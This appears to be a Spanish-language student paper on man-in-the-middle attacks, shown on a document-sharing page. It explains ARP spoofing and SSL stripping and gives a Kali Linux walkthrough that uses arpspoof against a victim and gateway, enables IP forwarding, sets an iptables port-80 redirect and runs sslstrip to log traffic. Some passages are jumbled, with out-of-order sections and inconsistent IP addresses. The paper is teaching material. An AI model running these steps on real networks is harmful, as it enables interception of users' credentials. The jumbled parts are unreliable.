Man in The Middle

Man in the middle MITM Andrade Bravo Andy Jose [email protected] Abstract—This document contains a brief explana

Views 119 Downloads 3 File size 867KB

Report DMCA / Copyright

DOWNLOAD FILE

Recommend stories
Man in the mirror
Man in the mirror

30 2 58KB Read more

Man in The Mirror
Man in The Mirror

11 0 4MB Read more

Man in the iron mask
Man in the iron mask

73 0 18MB Read more

Whittling The Man in The Moon PDF
Whittling The Man in The Moon PDF

Man in the Moon Simple carving uses just a knife and a scrap of basswood By Dave Stetson S craps of wood seem to multi

14 0 1MB Read more

Miranda July the Man in the Stairs
Miranda July the Man in the Stairs

Miranda July The Man on the Stairs It was a tiny sound but it woke me up because it was a human sound. I held my breath

89 0 35KB Read more

THE MAN IN THE IRON MASK.pdf
THE MAN IN THE IRON MASK.pdf

37 0 10MB Read more

Middle-Earth War in Rohan
Middle-Earth War in Rohan

60 2 20MB Read more

Man-in-the-Iron-Mask-WS1
Man-in-the-Iron-Mask-WS1

Worksheet Beginner Level The Man in the Iron Mask Alexandre Dumas A Before Reading 1 Look at the picture on the cover

21 0 67KB Read more

middle
middle

COME TO MIDDLE-EARTH! The world of brave and cruel Men, H o b b i t s and Elves, Orcs and Trolls and Wizards both goo

31 0 7MB Read more

Michael Jackson Man in the Mirror
Michael Jackson Man in the Mirror

59 0 561KB Read more

Citation preview

Man in the middle MITM Andrade Bravo Andy Jose [email protected]

Abstract—This document contains a brief explanation of as to computer attack known as man in the midle MITM, so too the steps to carry it out through a machine with kali_linux Linux operating system. Kali linux, mitm, arp spoofing,

I.

Pico Aponte Grecia Magaly [email protected]

como el protocolo https(The Hypertext Transfer Protocol secure) este ultimo modificado con el propósito de mejorar esta vulnerabilidad de red, https esta modificado para cuidar la seguridad de otro protocolo ssl, Secure Sockets Layer (capa de conexión segura), son protocolos criptográficos que proporcionan comunicaciones.

INTRODUCTION (HEADING 1)

En la actualidad muchos son los casos que se han dado sobre la inseguridad de las redes informáticas, esto debido a las falencias o vulnerabilidad que existe en los protocolos de comunicación, estas falencias son descubiertas por virus creados intencionalmente con el solo objetivo aprovechar la vulnerabilidad de dichos protocolos, conocidos como troyanos o malwares son capaces de aprovechar una red LAN o WAN y poder ingresar a computadoras mediante los puertos correspondientes a cada protocolo de comunicación. Estos ataques también han sido de gran ayuda para mejorar la seguridad en las redes y en los protocolos de comunicación que han tenido falencias y han dado paso a escándalos públicos en empresas públicas y privadas por la violación de sus redes de información. II.

MITM

Mejor conocido como man in the middle consiste en una red donde entre el usuario y el servidor existe un intermediario (atacante) que simula ser el router y asi poder capturar todos los paquetes o peticiones que el usuario haga a su servidor, siendo examinados por el atacante que se encuentra oculto teóricamente entre servidor y usuario.

Mitm es un modulo orientado principalmente hacia la web que se usa el protocol de comunicación http(The Hypertext Transfer Protocol) este protocolo no implementa seguridad

Transport Layer Security(2015) recuperado de: https://es.wikipedia.org/wiki/Transport_Layer_Security

En el ataque MiTM más habitual, se utiliza un router WiFi para interceptar las comunicaciones del usuario. Esto se puede realizar configurando el router malicioso para que parezca legítimo o atacando un error del mismo e interceptando la sesión del usuario. En el primero de los casos, el atancante configura su ordenador u otro dispositivo para que actúe como red WiFi, nombrándolo como si fuera una red pública (de un aeropuerto o una cafetería). Después, el usuario se conecta al “router” y busca páginas de banca o compras online, capturando el criminal las credenciales de la víctima para usarlas posteriormente. En el segundo caso, un delincuente encuentra una vulnerabilidad en la configuración del sistema de cifrado de un WiFi legítimo y la utiliza para interceptar las comunicaciones entre el usuario y el router. Éste es el método más complejo de los dos, pero también el más efectivo; ya que el atacante tiene acceso continuo al router durante horas o días. Además, puede husmear en las sesiones de forma silenciosa sin que la víctima sea consciente de nada. [1]

man in the midle usa también un método conocido como arp spoofing el cual consiste en alterar las direcciones ip y la tablas de rutas.

objetivo. Con esto podemos ejecutar cualquier herramienta de análisis de paquetes tales como tcpdump o Wireshark. [1] DESARROLLO DEL ATAQUE

Sslstrip SSL Strip consiste en hacer creer al usuario que está bajo una conexión segura, ya sea porque el usuario ve un candadito que indica seguridad, sslstrip puede falsificarlo, o por que el usuario no se fija si está bajo tráfico cifrado o no.

Para la simulación del ataque se usa una maquina con Windows 7 (victima), y un amaquina virtual de kali linux (Atacante)

ARP Spoofing El principio o método del ARP Spoofing consiste en enviar mensajes ARP falsos (spoofed) a la Ethernet. Normalmente con la finalidad de asociar la dirección MAC del atacante con la dirección IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (gateway). Cualquier tráfico dirigido a la dirección IP de ese nodo, será erróneamente enviado al atacante, en lugar de su destino real. El atacante, puede entonces elegir, entre reenviar el tráfico a la puerta de enlace predeterminada real (ataque pasivo o escucha), o modificar los datos antes de reenviarlos (ataque activo). El atacante puede incluso lanzar un ataque de tipo DoS (Denegación de Servicio) contra una víctima, asociando una dirección MAC inexistente con la dirección IP de la puerta de enlace predeterminada de la víctima. [1] Mediante el ataque realizado por las tablas ARPspoof se inunda nuestra red indicando las direcciones mac asociadas con las direcciones IP de la o las víctimas, del mismo modo se muestra también las dirección IP relacionada con el router para hacer uso de su puerta de enlace. De esta manera al momento de actualizar la tabla de rutas será transparente esta información maliciosa así cuando la víctima envía paquetes a través de la red mediante el router esta se estará redireccionando a la maquina atacante y como la maquina atacante tiene a su alcance las direcciones Mac reales se realiza un redireccionamiento al destinatario verdadero con el fin de que el proceso sea transparente para la víctima.

Y una maquina atacante con kali linux

El primer paso es poner en red a la maquina de kali para esto puede ser usada una ip publica o una privada.

Para ejecutar ARP spoofing y modificar el enrutamiento de los paquetes en kali Linux se usan los siguientes comandos, lo que hace cada comando en nuestro lenguaje es lo siguiente. El siguiente comando le dirá la puerta de entrada "yo soy 192.168.4.114" la ip d kali, y en la siguiente orden le dice 192.168.0.114 "Yo soy la puerta de entrada" $ Sudo arpspoof 192.168.0.100 -t 192.168.0.1 $ Sudo arpspoof 192.168.0.1 -t 192.168.0.100 Con esto, todo el tráfico que se supone que ir a la puerta de entrada de la máquina, y al revés, pasará a través de nuestra máquina primero, y sólo entonces remitida al verdadero



Para asegurarse de que el tráfico se reenvía al destino real como llegar a nuestra máquina, deben ejecutar el siguiente comando

-

cat /proc/sys/net/ipv4/ip_forward 0 Si el valor devuelto es cero es necesario cambiarlo a uno, mediate el comando

-

echo 1 >> /proc/sys/net/ipv4/ip_forward

Accedemos como root o super usuario El siguiente comando nos ayuda a realizar un scan de las ips activas en la red  

fping -a -g ipInicial IpFinal hosts" > hots fping –a –g 192.168.1.1 192.168.1.1 > hots



Sudo –sH

Ejecutamos el comando arspoof  arpspoof –i eth0 –t 192.168.4.101 192.168.4.1

192 168.1.1 ip incial para el scan 192 168.1.100 ip final para el scan -

-a realiza el scan -g realiza un listado de de las ip fijas de un rango determinado > hots nos indica el nombre del archivo en que se guardará el listado scaneado Abrimos otro terminal y con el siguiente comando lo que haremos es redireccionar el trafico arpspoof 

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

Para visualizar los archivo con las ips scaneadas ejecutamos el siguiente comando 

Gedit hots

Ingresamos el comnado de sslstrip que hace crear un aparariencia de sitio web seguro. 

sslstrip -w cap -l 8080

Y finalmente ingresamos  tail –f cap

III.



  

CONCLUSIONES Man in the middle es un tipo de ataque informatico que permite manipular información para ciertos tipos de páginas con protocolo http, mas no para protocolo https, ya este protocolo fue Mitm es un módulo principalmente para la web el cual puede ser ejecutado mediante websploit El ataque es útil para todo tráfico que pasa por el router es decir también, para enrutamientos en la red LAN Man in the middle puedes ser realizado por los diferentes modulos que ofrece kali como websploit, el cual es necesario cargar mitm sin embargo es necesario recalcar que este método está quedando en deshuso ya que está orientado para la web http y no para https.

BIBLIOGRAFÍA

[1] KASPERSTKY, «¿que es un ataque man-in-the-middle?,» 07 2013. [En línea]. Available: https://blog.kaspersky.com.mx/que-es-un-ataque-man-inthe-middle/469/. [2] wikipedia, «ARP spoofing,» 24 12 2014. [En línea]. Available: https://es.wikipedia.org/wiki/ARP_Spoofing. [Último acceso: 06 07 2015]. [3] Anonimo , «How to sniff network traffic in Linux,» [En línea]. Available: https://docs.oseems.com/general/operatingsystem/linux/sn iff-network-traffic. [Último acceso: 06 07 2015].